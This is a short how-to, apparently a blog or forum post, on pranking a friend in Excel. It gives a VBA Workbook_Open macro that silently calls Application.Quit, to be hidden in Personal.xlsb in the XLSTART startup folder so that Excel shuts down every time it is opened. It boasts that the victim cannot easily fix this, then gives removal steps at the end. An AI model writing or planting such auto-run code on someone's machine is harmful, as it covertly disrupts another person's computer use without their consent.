Wanna pull a mean prank to your friend? i will show you how to pull a prank in Excel. Locate XLSTART folder, depends on which operating system you use. in Windows Run type %XLSTART% and enter. once you open the referred folder see if there is a excel file Personal.xlsb if does not exist create one and save in the same folder. open Personal.xlsb then with ALT F11 enter Visual Basic Editor and in object "ThisWorkbook" place the following code and then save and close. Then whoever opens Excel will face annoying auto quit and will not be able to solve it easily. Private Sub Workbook_Open() Application.DisplayAlerts = False Application.Quit End Sub how to disable this back to normal :-) so that you do not run around finding solution for this. cut Personal.xlsb from XLSTART folder and paste in another directory folder. then open excel application go to excel option trust center Macro Setting and disable macros. open Personal.xlsb then ALT F11 and remove the above code from "ThisWorkbook" object and save and close and then place back the Personal.xlsb in the XLSTART folder. then Excel should work as normal.
